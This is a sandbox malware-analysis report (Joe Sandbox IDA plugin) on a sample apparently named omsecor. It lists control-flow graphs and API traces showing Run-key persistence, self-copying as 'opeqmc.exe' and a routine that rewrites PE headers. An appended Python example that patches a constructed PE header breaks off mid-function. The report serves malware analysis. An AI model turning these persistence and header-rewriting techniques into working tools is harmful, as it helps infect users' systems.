                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph

                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 365 403cfc-403cff 355->365 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 364 403daa-403dab 359->364 361->362 363 403c40-403c4c IsValidCodePage 361->363 362->357 363->362 366 403c52-403c5f GetCPInfo 363->366 367 403d01-403d11 365->367 368 403cd2-403cd7 365->368 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->365 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 376 403ce1-403cf2 375->376 377 403cf7-403cfb 375->377 376->375 377->365 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 391 403ca0-403ca7 387->391 389->389 390 403d71-403d7f call 403825 389->390 390->383 394 403d52-403d54 391->394 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph

                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 408 401ad6-401adc 401->408 403->402 407 401af8-401afe GetProcAddress 403->407 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph

                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          Control-flow Graph

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(02011588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Control-flow Graph

                          control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
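
The two read sizes in the trace above correspond to fixed PE structures: 0x40 bytes is sizeof(IMAGE_DOS_HEADER), whose last field e_lfanew (offset 0x3C) points at the NT headers, and 0xF8 bytes is sizeof(IMAGE_NT_HEADERS32) (4-byte signature, 20-byte file header, 224-byte optional header). The function therefore copies a file in full, then reads a DOS header, follows it to the NT headers and writes an 0xF8-byte block back at a chosen offset. The Python example below is added here for illustration; it is not part of the sandbox output or of the sample's code. It builds a constructed header-only PE32 image in memory, walks the same read-0x40 / follow-e_lfanew / read-0xF8 / write-0xF8 sequence and rewrites one field. Which header bytes the sample actually changes is not stated in the report; patching FILE_HEADER.TimeDateStamp here is an assumption chosen only to make the round trip checkable.

```python
import struct

DOS_HEADER_SIZE = 0x40    # sizeof(IMAGE_DOS_HEADER): the first ReadFile size in the trace
NT_HEADERS32_SIZE = 0xF8  # sizeof(IMAGE_NT_HEADERS32): 4 (Signature) + 20 (FILE_HEADER) + 224 (OPTIONAL_HEADER32)


def build_minimal_pe32(e_lfanew=0x80, timestamp=0x5F000000):
    """Constructed sample input: a header-only PE32 image, not a real binary and not loadable."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)              # IMAGE_DOS_HEADER.e_lfanew
    stub = bytes(e_lfanew - DOS_HEADER_SIZE)                 # zero-filled DOS stub padding
    file_header = struct.pack(
        "<HHIIIHH",
        0x014C,      # Machine = IMAGE_FILE_MACHINE_I386
        1,           # NumberOfSections
        timestamp,   # TimeDateStamp
        0, 0,        # PointerToSymbolTable, NumberOfSymbols
        224,         # SizeOfOptionalHeader for PE32
        0x0102,      # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    optional = bytearray(224)
    struct.pack_into("<H", optional, 0, 0x10B)               # OptionalHeader.Magic = PE32
    return bytes(dos) + stub + b"PE\x00\x00" + file_header + bytes(optional)


def read_headers(image):
    """Mirror the trace: read 0x40 bytes, follow e_lfanew, read 0xF8 bytes of NT headers."""
    dos = image[:DOS_HEADER_SIZE]
    if len(dos) < DOS_HEADER_SIZE or dos[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
    nt = image[e_lfanew:e_lfanew + NT_HEADERS32_SIZE]
    if len(nt) != NT_HEADERS32_SIZE or nt[:4] != b"PE\x00\x00":
        raise ValueError("NT headers truncated or PE signature missing")
    return e_lfanew, nt


def is_pe32(image):
    """True when the image parses and its optional header carries the PE32 magic."""
    try:
        _, nt = read_headers(image)
    except ValueError:
        return False
    return struct.unpack_from("<H", nt, 4 + 20)[0] == 0x10B  # Signature + FILE_HEADER precede the magic


def timestamp_of(image):
    _, nt = read_headers(image)
    return struct.unpack_from("<I", nt, 8)[0]                # Signature(4) + Machine(2) + NumberOfSections(2)


def patch_timestamp(image, new_timestamp):
    """Rewrite the 0xF8-byte NT header block in place, like the final SetFilePointer + WriteFile.

    The choice of field is an assumption for illustration; the report does not name it.
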